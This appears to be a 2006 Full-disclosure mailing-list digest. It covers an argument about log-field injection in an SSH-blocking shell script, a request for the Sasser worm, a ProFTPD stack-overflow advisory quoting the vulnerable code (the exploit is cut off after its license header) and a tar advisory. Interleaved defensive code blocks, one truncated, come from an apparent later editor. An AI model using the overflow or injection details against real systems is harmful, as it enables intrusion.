    # uname -a
    OpenBSD hades.disgraced.org 4.0 GENERIC#1 i386
    # awk '{print $13}' /var/log/authlog|grep \.|sort -ru
    63.243.158.221
    61.129.85.230
    220.132.113.163
    219.149.211.49
    213.195.75.41
    206.210.96.56

> I don't believe the suggestion was ever that you had malicious intent, but
> rather that you have very horrible coding security habits.

This should have been stated to the list as opposed to "You're backdooring people".

> I'm disinclined to sort out which of your machines I can get root on right
> now because you are running this script, but I would expect that someone
> reading this mailing list is already on the way and would strongly advise
> that you disable those cron jobs.

I'll give you addresses if you'd like to take a shot at it.

--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

"The happiness of society is the end of government." John Adams
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
> On Mon, Nov 27, 2006 at 04:41:43PM -0500, J. Oquendo wrote:
> > That specially crafted attempt would be a HUGE raping of TCP/IP. How do you
> > suppose it would be possible for someone to insert 0wn3ed or any other
> > variable outside of an IP address? That's impossible.
>
> Putting extra spaces in the log entry is easy.

And extra spaces would do what... If the point is to insert a name someone in order to send out information from the 13th column in authlog, then I'll tell you what, you name the system it can happen on and I will personally apologize publicly. It is not doable. I'd have a better chance of hanging with Santa while I bang Angelina Jolie while Denise Richards watches me.

--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

"The happiness of society is the end of government." John Adams
Re: [Full-disclosure] SSH brute force blocking tool
Michael Holstein wrote:
> > That specially crafted attempt would be a HUGE raping of TCP/IP. How do you
> > suppose it would be possible for someone to insert 0wn3ed or any other
> > variable outside of an IP address?
>
> Remember the (in)famous quote "...that vulnerability is purely theoretical..."?
>
> I think the point is you don't use $language to split a bunch of fields, and
> then pipe them back through /bin/sh without making sure they're not malicious.
> Doesn't matter that you can't think of a way to make them malicious ..
> somebody else will find one. It's safer to just assume it'll happen and always
> sanitize variables before you {do_stuff;} with them.
>
> (my $0.02)
>
> ~Mike.

So I ask you too... Find me any Unix derivative that will allow someone to pass a name, word, place, etc into the 13th column of authlog, then bypass grep which is grep'ing out for decimals.

--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

"The happiness of society is the end of government." John Adams
Re: [Full-disclosure] SSH brute force blocking tool
On 27.Nov.2006 04:39PM -0500, Michael Holstein wrote:
> why not save all that trouble and just use the --limit directive in iptables?
> (examples on the netfilter mailing-list).

or use denyhosts (denyhosts.sf.net)

--josh

Joshua D. Abraham
Northeastern University
College of Computer and Information Science
www.ccs.neu.edu/home/jabra
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:55:46PM -0500, J. Oquendo wrote:
> No it can't. Even if it was rm -rf someone placed in, did you not notice my
> grep statement? Only print items with a decimal. At no given point anywhere
> on the 13th column whether it's Solaris, NetBSD, FreeBSD, would there be an
> option for someone to craft anything...

J, I realise this is a difficult issue to grasp, but stick with it.

Let's say that a fictitious log entry looks like this:

    DATE ERROR USERNAME ADDRESS PORT

And let's say you're trying to print column 4 to get the address. Here's an example:

    Monday INVALID foobar 123.123.123.123 1024

You print $4 and get 123.123.123.123, excellent. Now let's try logging in as "foo bar".

    Monday INVALID foo bar 123.123.123.123 1024

What's in $4 now? That's right, attacker controlled data.

> I'll give you addresses if you'd like to take a shot at it.

Sure, send them to the list, there are bound to be some takers.

Thanks, Tavis.

--
[EMAIL PROTECTED] | finger me for my pgp key.
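The column shift Tavis illustrates above, together with the earlier points about the extracted field being handed to sh and about the fixed /tmp/hosts.deny file, as an added example that is not part of any post in this thread: it reproduces the shift on constructed sshd syslog lines in the layout the thread's awk expects (address in column 13), then shows an extraction anchored on the trailing "from <addr> port <n>" fields with strict dotted-quad validation, and a private temporary file instead of a fixed /tmp path. The function names (naive_extract, is_ipv4, hardened_extract, count_valid_naive, write_blocklist) and all log lines are constructions for this example.

```shell
#!/bin/sh
# Added example, not the script discussed in the thread. A fixed-column
# extraction ($13 of the line after "error retrieving") is shifted by a
# username containing spaces; the hardened version anchors on the fields
# sshd appends after the username and validates every candidate address.
# Function names are hypothetical; the log lines below are constructed
# (RFC 5737 documentation addresses, placeholder host name).

SAMPLE_LOG='Nov 27 15:59:37 host sshd[1234]: Invalid user admin from 192.0.2.10
Nov 27 15:59:37 host sshd[1234]: error retrieving information about user admin
Nov 27 15:59:38 host sshd[1234]: Failed password for invalid user admin from 192.0.2.10 port 40334 ssh2
Nov 27 16:01:02 host sshd[1240]: Invalid user foo bar baz.example from 198.51.100.7
Nov 27 16:01:02 host sshd[1240]: error retrieving information about user foo bar baz.example
Nov 27 16:01:03 host sshd[1240]: Failed password for invalid user foo bar baz.example from 198.51.100.7 port 40335 ssh2'

# The approach under discussion: field 13 of the line following "error
# retrieving", kept if it contains a dot. The two extra words in the second
# username push the address out of column 13 and a username fragment in.
naive_extract() {
    printf '%s\n' "$SAMPLE_LOG" |
        awk '/error retrieving/ { getline; print $13 }' | grep '\.' | sort -u
}

# Strict IPv4 check: digits and dots only, exactly four octets, each 0-255.
# Host names, shell metacharacters, spaces and empty fields are all rejected.
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    rest=$1
    n=0
    while [ -n "$rest" ]; do
        octet=${rest%%.*}
        case "$rest" in
            *.*) rest=${rest#*.} ;;
            *)   rest='' ;;
        esac
        n=$((n + 1))
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    [ "$n" -eq 4 ]
}

# Hardened extraction: the username is attacker-supplied and may contain
# spaces, but sshd appends " from <addr> port <n> ssh2" after it, so the
# address is the fourth field from the end. Every candidate must still pass
# is_ipv4 before it leaves this function; rejects go to stderr for review.
hardened_extract() {
    printf '%s\n' "$SAMPLE_LOG" |
        awk 'NF >= 5 && /Failed password for/ && $(NF-4) == "from" && $(NF-2) == "port" { print $(NF-3) }' |
        sort -u |
        while IFS= read -r addr; do
            if is_ipv4 "$addr"; then
                printf '%s\n' "$addr"
            else
                printf 'rejected non-address token: %s\n' "$addr" >&2
            fi
        done
}

# How many of the naive results survive validation: the host-name fragment is
# dropped, so a blocklist built from column 13 would contain attacker-chosen
# text while a validated one contains only addresses.
count_valid_naive() {
    naive_extract | while IFS= read -r tok; do is_ipv4 "$tok" && echo x; done | wc -l | tr -d ' '
}

# Writes the validated list to a private temporary file rather than a fixed
# path such as /tmp/hosts.deny, which another local user could pre-create or
# redirect with a symlink. Prints the file name for the caller to compare.
write_blocklist() {
    tmp=$(mktemp) || return 1
    hardened_extract > "$tmp" 2>/dev/null
    printf '%s\n' "$tmp"
}

echo "naive column 13:";     naive_extract
echo "hardened, validated:"; hardened_extract
```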
[Full-disclosure] Potentially OT: AJAX article
Dear all,

Please forgive the potentially off topic post, but please find below a link to a recent article concerning AJAX security I composed for Heise UK / c't, in the sincere hopes that it proves useful to anyone still even remotely interested in much hyped Web 2.0 technologies (or DHTML...)

Many thanks.

Michael Kemp (clappymonkey)

Ajax Security: Stronger than Dirt? A look at the security implications of Ajax

Ajax allows the development of more feature rich, asynchronous applications, but in doing so opens up new possibilities for attackers. We look at the relevant security issues and their possible solutions.

http://www.heise-security.co.uk/articles/81264
Re: [Full-disclosure] Sasser or other nasty worm needed
Well if it's an air gapped network then there's no way to get patches unless you carry them over on a disk. When I taught a class at a local university we did a similar experiment on an unpatched air gapped network.

On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote:
> a douchebag? I dunno but why the hell aren't your boxes patched to Sasser yet?
>
> -KF
>
> deep fried wrote:
> > What am I Consultant? School Teacher? Terrorist?
> >
> > On 11/27/06, *K F (lists)* [EMAIL PROTECTED] wrote:
> > > Dude... settle the hell down. I see little problem with this guy doing
> > > this on a closed LAN in a lab setting. What part of CLOSED LAB did you
> > > miss? It's not like he is intentionally letting it loose on the entire
> > > school LAN.
> > >
> > > -KF
> > >
> > > [EMAIL PROTECTED] wrote:
> > > > Chris - I don't know what to make of your "please reply off-list; I'm
> > > > not a member" comment. It's almost as ridiculous as what you are
> > > > requesting. If I take your question at face value, you are an
> > > > INSTRUCTOR, not an Admin. That means you probably teach an A+ class,
> > > > maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS
> > > > WHATSOEVER even THINKING about turning loose a dangerous piece of
> > > > Malware in someone else's network. And it IS someone else's network;
> > > > specifically it belongs to the district.
> > > >
> > > > Speaking as a network engineer for a large midwestern school district,
> > > > if you did that in MY network, I'd have your job. GOD HELP YOU if it
> > > > turns out that you actually ARE a teacher in my district. I don't
> > > > recognize the name, but you can bet your ass that every time we have
> > > > an infection in one of our schools from now until the stars burn out;
> > > > that I'll be making a point of asking who the computer teachers are in
> > > > that building.
> > > >
> > > > You want to teach these kids a lesson? Write it on the blackboard. We
> > > > have enough work to do just keeping up with the kids, without an
> > > > alleged professional turning loose a worm in our network.
> > > >
> > > > > I'm a high school network administration teacher looking for a
> > > > > creative means of teaching my students the importance of patch
> > > > > management. I was hoping to let a particularly nasty worm loose on
> > > > > a closed lab so my students could see what happens during an
> > > > > outbreak, but I'm running into a hitch - I can't find a worm that
> > > > > would spread quickly enough to be useful. Does anyone have a copy
> > > > > of Sasser or a similar worm that they would be willing to send or
> > > > > link me to? Please contact me off-list.
> > > > >
> > > > > I would be happy to verify my identity as a high school teacher
> > > > > off-list as I'm sure that is a concern for most anyone who has what
> > > > > I am looking for. Please do not reply on list as I am not currently
> > > > > a member.
> > > > >
> > > > > Thank you,
> > > > > Chris
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006 13:31:04 CST, Octal said:
> Well if it's an air gapped network then there's no way to get patches unless
> you carry them over on a disk. When I taught a class at a local university we
> did a similar experiment on an unpatched air gapped network.

I've seen this done lots of times. Amazing how often people forget to wipe the disks after delivering the patches... ;)
[Full-disclosure] ProFTPD 1.3.0 remote stack overflow
Hi all,

Our ProFTPD advisory is below.

Name: ProFTPD remote buffer overflow vulnerability
Vendor: http://www.proftpd.org
Release date: 27 Nov, 2006
URL: http://www.gleg.net/proftpd.txt
CVE: CVE-2006-5815
Author: Evgeny Legerov [EMAIL PROTECTED]

I. DESCRIPTION

A remotely exploitable stack overflow vulnerability has been found in the ProFTPD server. The vulnerability allows a remote authenticated attacker to gain root privileges.

II. DETAILS

The vulnerability exists in the sreplace() function from src/support.c. An oversimplified analysis of the vulnerability is below:

    char *sreplace(pool *p, char *s, ...) {
      va_list args;
      char *m,*r,*src = s,*cp;
      char **mptr,**rptr;
      char *marr[33],*rarr[33];
      char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL;
      size_t mlen = 0, rlen = 0, blen;
      int dyn = TRUE;

      cp = buf;
      *cp = '\0';

      memset(marr, '\0', sizeof(marr));
      memset(rarr, '\0', sizeof(rarr));
      blen = strlen(src) + 1;

      va_start(args, s);

      while ((m = va_arg(args, char *)) != NULL && mlen < sizeof(marr)-1) {
        char *tmp = NULL;
        size_t count = 0;

        if ((r = va_arg(args, char *)) == NULL)
          break;

        /* Increase the length of the needed buffer by the difference between
         * the given match and replacement strings, multiplied by the number
         * of times the match string occurs in the source string.
         */
        tmp = strstr(s, m);
        while (tmp) {
          pr_signals_handle();
          count++;

          /* Be sure to increment the pointer returned by strstr(3), to
           * advance past the beginning of the substring for which we are
           * looking.  Otherwise, we just loop endlessly, seeing the same
           * value for tmp over and over.
           */
          tmp += strlen(m);
          tmp = strstr(tmp, m);
        }

        /* We are only concerned about match/replacement strings that actually
         * occur in the given string.
         */
        if (count) {
          blen += count * (strlen(r) - strlen(m));
          marr[mlen] = m;
          rarr[mlen++] = r;
        }
      }

      va_end(args);

      /* Try to handle large buffer situations (i.e. escaping of
       * PR_TUNABLE_PATH_MAX (>2048) correctly, but do not allow very big buffer
       * sizes, that may be dangerous (BUFSIZ may be defined in stdio.h) in some
       * library functions.
       */
    #ifndef BUFSIZ
    # define BUFSIZ 8192
    #endif

      if (blen < BUFSIZ)                                   /* [1] */
        cp = pbuf = (char *) pcalloc(p, ++blen);

      if (!pbuf) {                                         /* [2] */
        cp = pbuf = buf;
        dyn = FALSE;
        blen = sizeof(buf);
      }

      while (*src) {
        for (mptr = marr, rptr = rarr; *mptr; mptr++, rptr++) {
          mlen = strlen(*mptr);
          rlen = strlen(*rptr);

          if (strncmp(src, *mptr, mlen) == 0) {
            sstrncpy(cp, *rptr, blen - strlen(pbuf));      /* [3] */
            if (((cp + rlen) - pbuf + 1) > blen) {
              pr_log_pri(PR_LOG_ERR,
                "WARNING: attempt to overflow internal ProFTPD buffers");
              cp = pbuf + blen - 1;
              goto done;
            } else {
              cp += rlen;
            }
            src += mlen;
            break;
          }
        }

        if (!*mptr) {
          if ((cp - pbuf + 1) > blen) {                    /* [4] */
            pr_log_pri(PR_LOG_ERR,
              "WARNING: attempt to overflow internal ProFTPD buffers");
            cp = pbuf + blen - 1;
          }
          *cp++ = *src++;
        }
      }

     done:
      *cp = '\0';

      if (dyn)
        return pbuf;

      return pstrdup(p, buf);
    }

First of all, the value of 'blen' is controlled by us: if we set it to a value which is less than BUFSIZ (see [1]) we can trigger a heap overflow, otherwise we will be able to trigger a stack overflow (see [2]).

Because of the miscalculation on line [4], we can overwrite the last (NULL) byte of 'pbuf', so that 'strlen(pbuf)' will be greater than 'blen'. The code on line [3] will then overwrite the 'pbuf' buffer with our data, because the 'sstrncpy' function works just fine when the third argument is negative.

At least two vectors exist for this vulnerability:

1. MKD command
2. pr_display_file

The included trivial proof of concept exploit code uses the second attack vector. Write access is necessary for this exploit to work.

III. VENDOR RESPONSE

The vendor has released version 1.3.0a, which addresses this issue. For more info about the newest version of ProFTPD and possible workarounds please visit:

http://www.proftpd.org
http://bugs.proftpd.org/show_bug.cgi?id=2858

IV. CREDIT

The vulnerability has been discovered by Evgeny Legerov.

V. EXPLOIT

    # vd_proftpd.pm - Metasploit module for ProFTPD stack overflow
    #
    # Copyright (c) 2006 Evgeny Legerov
    #
    # Permission to use, copy, modify, and distribute this software for any
    # purpose with or without fee is hereby granted, provided that the above
    # copyright notice and this permission notice appear in all copies.
    #
    # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
    # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
    # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
    # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
    #
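The two miscalculations the advisory describes, the check at [4] that lets a data byte into the terminator's slot and the copy limit at [3] computed as blen - strlen(pbuf), as an added example that is not from the advisory or from ProFTPD: each is isolated in a small function, the unsigned wrap is shown on a constructed buffer, and a hardened check and a cursor-based remaining-space computation sit beside them. Function names are hypothetical and the hardened variants are this example's, not the vendor's 1.3.0a fix.

```c
/* Added example, not code from the advisory or from ProFTPD: isolates the two
 * arithmetic mistakes described for sreplace() and shows hardened versions.
 * Function names are hypothetical. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The bounds check at [4]: it refuses a write only once cp is already past
 * the end, so a data byte may still be written into the last slot, the one
 * reserved for the NUL terminator.  Returns true when the write is refused. */
bool check_vuln(const char *pbuf, const char *cp, size_t blen) {
    return (size_t)(cp - pbuf) + 1 > blen;
}

/* Hardened check: the last slot belongs to the terminator, so a data write
 * is refused as soon as it would land there. */
bool check_safe(const char *pbuf, const char *cp, size_t blen) {
    return (size_t)(cp - pbuf) + 1 >= blen;
}

/* The remaining-space computation at [3]: blen - strlen(pbuf).  It is only
 * meaningful while the terminator lies inside the first blen bytes; once it
 * has been overwritten strlen() runs on, and the unsigned subtraction wraps
 * to a huge value that is then handed to sstrncpy() as the copy limit. */
size_t remaining_vuln(const char *pbuf, size_t blen) {
    return blen - strlen(pbuf);
}

/* Hardened computation: derive the used length from the write cursor, never
 * from strlen() on the destination, and keep one byte for the terminator.
 * Returns 0 when nothing more may be written. */
size_t remaining_safe(const char *pbuf, const char *cp, size_t blen) {
    size_t used = (size_t)(cp - pbuf);
    if (used + 1 >= blen)
        return 0;
    return blen - used - 1;
}

/* Bounded append built on remaining_safe(): copies as much of r as fits,
 * always terminates, and reports truncation instead of running on. */
bool append_bounded(char *pbuf, char **cp, size_t blen, const char *r) {
    size_t room = remaining_safe(pbuf, *cp, blen);
    size_t rlen = strlen(r);
    bool fits = rlen <= room;
    size_t n = fits ? rlen : room;
    memcpy(*cp, r, n);
    *cp += n;
    **cp = '\0';
    return fits;
}

/* Constructed scenario: a logical buffer of BLEN bytes whose terminator has
 * been overwritten (the state [4] permits).  The backing array is larger so
 * that strlen() stays inside allocated memory for this demonstration. */
enum { BLEN = 8 };

size_t demo_wrapped_limit(void) {
    char backing[16];
    memset(backing, 'A', 10);             /* 10 non-NUL bytes: terminator lost */
    backing[10] = '\0';
    return remaining_vuln(backing, BLEN); /* 8 - 10 wraps to SIZE_MAX - 1 */
}

/* With cp at the terminator slot the original check still permits a write;
 * the hardened check refuses it and reports no room.  True if both hold. */
bool demo_checks_differ(void) {
    char buf[BLEN] = {0};
    const char *cp = buf + BLEN - 1;
    return !check_vuln(buf, cp, BLEN) && check_safe(buf, cp, BLEN)
           && remaining_safe(buf, cp, BLEN) == 0;
}

/* Appending a 10-byte replacement into an 8-byte buffer: 7 bytes land, the
 * NUL is preserved, truncation is reported.  Returns the stored length, or
 * (size_t)-1 if the append wrongly claimed success. */
size_t demo_truncated_append(void) {
    char buf[BLEN] = {0};
    char *cp = buf;
    if (append_bounded(buf, &cp, BLEN, "abcdefghij"))
        return (size_t)-1;
    return strlen(buf);
}

int main(void) {
    printf("wrapped copy limit: %zu\n", demo_wrapped_limit());
    printf("checks differ: %d\n", demo_checks_differ());
    printf("stored after truncation: %zu\n", demo_truncated_append());
    return 0;
}
```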
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006 17:16:31 EST, Rick said:
> On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote:
> > You would have us believe that the guy is clued enough to run a closed lab
> > without screwing up (and there's *lots* of ways to screw up, starting with
> > forgetting to wipe the drives afterwards, forgetting to disable a wireless
> > card, forgetting to not plug any of the boxes into the normal net,
> > forgetting to...).
>
> so when you go to mcdonalds and hand over your $5 for your MCbig meal, do you
> consider the repercussions of supporting an industry which pays low wages, is
> under-staffed, and promotes world-hunger by using enough grain to feed a
> continent, etc...?

WTF does that have to do with the topic? Unless you want to make the point that often, the McDonald's staff fails to use a level of food-preparation hygiene that matches the computer-security hygiene requirements to work with known malware?

The average McDonald's doesn't have biohazard signs (whether they should is a different rant) - and even the average doctor's office that *does* have biohazard signs for used hypodermic needles and the like usually has special training/procedures for dealing with the stuff. And labs that do active research on biohazards have even stricter protocols. (Make note, there *have* been screw-ups in the protocols at places that handle stuff like Ebola and smallpox - Preston's "The Hot Zone" has a nice story of a dead monkey with nothing but a plastic garbage bag keeping the nasties in, and a few years ago, there was a small to-do in one of the labs in England that had some smallpox...)

> > And yet he's not clued enough to know how to find a copy of Sasser by
> > himself.
>
> so what? do *you* know where to find a copy?

Yes.

> did you always?

Yes.

> have you always been able to configure a network to talk via EIGRP?

No, because when I first got on the net, RFC1058 was still 4 years in the future. So it wasn't always possible, because the option didn't always exist.

> > There are a lot of people who are of the opinion that if you have to ask
> > where to find a copy of Sasser, you're not clued enough to be trusted with
> > a copy.
>
> perhaps the next time you need a doctor, the one you find will laugh at you
> with the same sense of elitism you demonstrate.

Did I say I was one of the "lot of people"? Did you notice that I was replying *in the context of KF's comments* saying "It's cool because it's in a closed lab"?
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote:
> You would have us believe that the guy is clued enough to run a closed lab
> without screwing up (and there's *lots* of ways to screw up, starting with
> forgetting to wipe the drives afterwards, forgetting to disable a wireless
> card, forgetting to not plug any of the boxes into the normal net,
> forgetting to...).

so when you go to mcdonalds and hand over your $5 for your MCbig meal, do you consider the repercussions of supporting an industry which pays low wages, is under-staffed, and promotes world-hunger by using enough grain to feed a continent, etc...?

> And yet he's not clued enough to know how to find a copy of Sasser by
> himself.

so what? do *you* know where to find a copy? did you always? have you always been able to configure a network to talk via EIGRP?

> There are a lot of people who are of the opinion that if you have to ask
> where to find a copy of Sasser, you're not clued enough to be trusted with a
> copy.

perhaps the next time you need a doctor, the one you find will laugh at you with the same sense of elitism you demonstrate.

Rick
[Full-disclosure] ProFTPD remote buffer overflow vulnerability
Hi all,

Name: ProFTPD remote buffer overflow vulnerability
Vendor: http://www.proftpd.org
Release date: 27 Nov, 2006
URL: http://www.gleg.net/proftpd.txt
CVE: CVE-2006-5815
Author: Evgeny Legerov [EMAIL PROTECTED]

I. DESCRIPTION

A remotely exploitable stack overflow vulnerability has been found in the ProFTPD server. The vulnerability allows a remote authenticated attacker to gain root privileges.

II. DETAILS

The vulnerability exists in the sreplace() function from src/support.c. An oversimplified analysis of the vulnerability is below:

    char *sreplace(pool *p, char *s, ...) {
      va_list args;
      char *m,*r,*src = s,*cp;
      char **mptr,**rptr;
      char *marr[33],*rarr[33];
      char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL;
      size_t mlen = 0, rlen = 0, blen;
      int dyn = TRUE;

      cp = buf;
      *cp = '\0';

      memset(marr, '\0', sizeof(marr));
      memset(rarr, '\0', sizeof(rarr));
      blen = strlen(src) + 1;

      va_start(args, s);

      while ((m = va_arg(args, char *)) != NULL && mlen < sizeof(marr)-1) {
        char *tmp = NULL;
        size_t count = 0;

        if ((r = va_arg(args, char *)) == NULL)
          break;

        /* Increase the length of the needed buffer by the difference between
         * the given match and replacement strings, multiplied by the number
         * of times the match string occurs in the source string.
         */
        tmp = strstr(s, m);
        while (tmp) {
          pr_signals_handle();
          count++;

          /* Be sure to increment the pointer returned by strstr(3), to
           * advance past the beginning of the substring for which we are
           * looking.  Otherwise, we just loop endlessly, seeing the same
           * value for tmp over and over.
           */
          tmp += strlen(m);
          tmp = strstr(tmp, m);
        }

        /* We are only concerned about match/replacement strings that actually
         * occur in the given string.
         */
        if (count) {
          blen += count * (strlen(r) - strlen(m));
          marr[mlen] = m;
          rarr[mlen++] = r;
        }
      }

      va_end(args);

      /* Try to handle large buffer situations (i.e. escaping of
       * PR_TUNABLE_PATH_MAX (2048) correctly, but do not allow very big buffer
       * sizes, that may be dangerous (BUFSIZ may be defined in stdio.h) in some
       * library functions.
       */
    #ifndef BUFSIZ
    # define BUFSIZ 8192
    #endif

      if (blen < BUFSIZ)
        cp = pbuf = (char *) pcalloc(p, ++blen);             /* [1] */

      if (!pbuf) {
        cp = pbuf = buf;                                      /* [2] */
        dyn = FALSE;
        blen = sizeof(buf);
      }

      while (*src) {
        for (mptr = marr, rptr = rarr; *mptr; mptr++, rptr++) {
          mlen = strlen(*mptr);
          rlen = strlen(*rptr);

          if (strncmp(src, *mptr, mlen) == 0) {
            sstrncpy(cp, *rptr, blen - strlen(pbuf));         /* [3] */
            if (((cp + rlen) - pbuf + 1) > blen) {
              pr_log_pri(PR_LOG_ERR,
                "WARNING: attempt to overflow internal ProFTPD buffers");
              cp = pbuf + blen - 1;
              goto done;

            } else {
              cp += rlen;
            }

            src += mlen;
            break;
          }
        }

        if (!*mptr) {
          if ((cp - pbuf + 1) > blen) {                       /* [4] */
            pr_log_pri(PR_LOG_ERR,
              "WARNING: attempt to overflow internal ProFTPD buffers");
            cp = pbuf + blen - 1;
          }

          *cp++ = *src++;
        }
      }

     done:
      *cp = '\0';

      if (dyn)
        return pbuf;

      return pstrdup(p, buf);
    }

First of all, the value of 'blen' is controlled by us: if we set it to a value which is less than BUFSIZ (see [1]) we can trigger a heap overflow, otherwise we will be able to trigger a stack overflow (see [2]).

Because of a miscalculation on line [4], we can overwrite the last (NULL) byte of 'pbuf', so that 'strlen(pbuf)' will be greater than 'blen'. The code on line [3] will then overwrite the 'pbuf' buffer with our data, because the 'sstrncpy' function works just fine when the third argument is negative.

At least two vectors exist for this vulnerability:

1. MKD command
2. pr_display_file

The included proof of concept exploit code uses the second attack vector. Write access is necessary for this exploit to work.

III. VENDOR RESPONSE

The vendor has released version 1.3.0a, which addresses this issue. For more info about the newest version of ProFTPD and possible workarounds please visit:

http://www.proftpd.org
http://bugs.proftpd.org/show_bug.cgi?id=2858

IV. CREDIT

The vulnerability has been discovered by Evgeny Legerov.

V. EXPLOIT

    # vd_proftpd.pm - Metasploit module for ProFTPD stack overflow
    #
    # Copyright (c) 2006 Evgeny Legerov
    #
    # Permission to use, copy, modify, and distribute this software for any
    # purpose with or without fee is hereby granted, provided that the above
    # copyright notice and this permission notice appear in all copies.
    #
    # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
    # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
    # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
    # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
    # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
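The advisory's remark about sstrncpy() and a "negative" third argument is the heart of the bug, so here is an added illustration (my code, not ProFTPD's or the advisory's): blen - strlen(pbuf) computed in size_t wraps to a huge value once the terminating NUL has been clobbered, shown next to a bounded replacement loop that checks remaining capacity before each copy and refuses oversized output instead of writing past the end. Function names are my own; the sample inputs are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* What sreplace() hands to sstrncpy() at [3]: blen - strlen(pbuf).
 * Both operands are size_t, so when the NUL at the end of pbuf has been
 * overwritten and strlen(pbuf) exceeds blen, the result wraps to SIZE_MAX-ish
 * instead of going negative, and the copy limit becomes meaningless. */
size_t naive_remaining(size_t blen, size_t used) {
    return blen - used;                     /* wraps when used > blen */
}

/* Hardened form: report zero free bytes rather than wrapping. */
size_t safe_remaining(size_t blen, size_t used) {
    return used < blen ? blen - used : 0;
}

/* Append src to dst (capacity cap; *used bytes already written, NUL not counted).
 * Leaves dst untouched and returns 0 when src plus its NUL would not fit. */
int bounded_append(char *dst, size_t cap, size_t *used, const char *src) {
    size_t need = strlen(src);
    size_t room = safe_remaining(cap, *used);
    if (room == 0 || need > room - 1)       /* keep one byte for the NUL */
        return 0;
    memcpy(dst + *used, src, need);
    *used += need;
    dst[*used] = '\0';
    return 1;
}

/* Replace every occurrence of `match` in `s` with `repl`, writing into dst[cap].
 * Same job sreplace() does for one match/replacement pair, but every copy goes
 * through bounded_append(), so an oversized result is rejected (return 0, dst
 * NUL-terminated but truncated) rather than written past the end of the buffer. */
int replace_all_bounded(const char *s, const char *match, const char *repl,
                        char *dst, size_t cap) {
    size_t used = 0, mlen = strlen(match);
    if (cap == 0 || mlen == 0)
        return 0;
    dst[0] = '\0';
    while (*s) {
        if (strncmp(s, match, mlen) == 0) {
            if (!bounded_append(dst, cap, &used, repl))
                return 0;
            s += mlen;
        } else {
            char one[2] = { *s++, '\0' };
            if (!bounded_append(dst, cap, &used, one))
                return 0;
        }
    }
    return 1;
}

/* Constructed demo: a replacement that fits in a 16-byte buffer. */
int demo_fits_ok(void) {
    char out[16];
    return replace_all_bounded("%u logged in", "%u", "alice", out, sizeof out) == 1
        && strcmp(out, "alice logged in") == 0;
}

/* Constructed demo: three 10-byte replacements cannot fit in 16 bytes and are refused. */
int demo_too_big_rejected(void) {
    char out[16];
    return replace_all_bounded("%u%u%u", "%u", "0123456789", out, sizeof out) == 0;
}

int main(void) {
    printf("naive remaining (16 - 17): %zu\n", naive_remaining(16, 17));
    printf("safe  remaining (16 - 17): %zu\n", safe_remaining(16, 17));
    printf("fits: %d, oversized rejected: %d\n", demo_fits_ok(), demo_too_big_rejected());
    return 0;
}
```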
[Full-disclosure] [USN-385-1] tar vulnerability
===
Ubuntu Security Notice USN-385-1           November 27, 2006
tar vulnerability
CVE-2006-6097
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  tar  1.15.1-2ubuntu0.2

Ubuntu 6.06 LTS:
  tar  1.15.1-2ubuntu2.1

Ubuntu 6.10:
  tar  1.15.91-2ubuntu0.3

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Teemu Salmela discovered that tar still handled the deprecated GNUTYPE_NAMES record type. This record type could be used to create symlinks that would be followed while unpacking a tar archive. If a user or an automated system were tricked into unpacking a specially crafted tar file, arbitrary files could be overwritten with user privileges.

Updated packages for Ubuntu 5.10:
Updated packages for Ubuntu 6.06 LTS:

Updated packages for Ubuntu 6.10:
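As an added defensive example (my code, not GNU tar's or Ubuntu's): a pre-extraction check of raw ustar header blocks that rejects the deprecated GNUTYPE_NAMES record type (typeflag 'N' in the GNU tar header format) and any entry or link target whose path would leave the extraction root. The field offsets are the standard 512-byte tar header layout; the sample headers are constructed in the block, and the function and enum names are my own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* ustar / GNU tar 512-byte header layout (only the fields inspected here). */
#define TAR_BLOCK     512
#define OFF_NAME      0      /* 100 bytes, NUL padded */
#define OFF_TYPEFLAG  156    /* 1 byte */
#define OFF_LINKNAME  157    /* 100 bytes, NUL padded */

enum tar_verdict {
    TAR_OK = 0,
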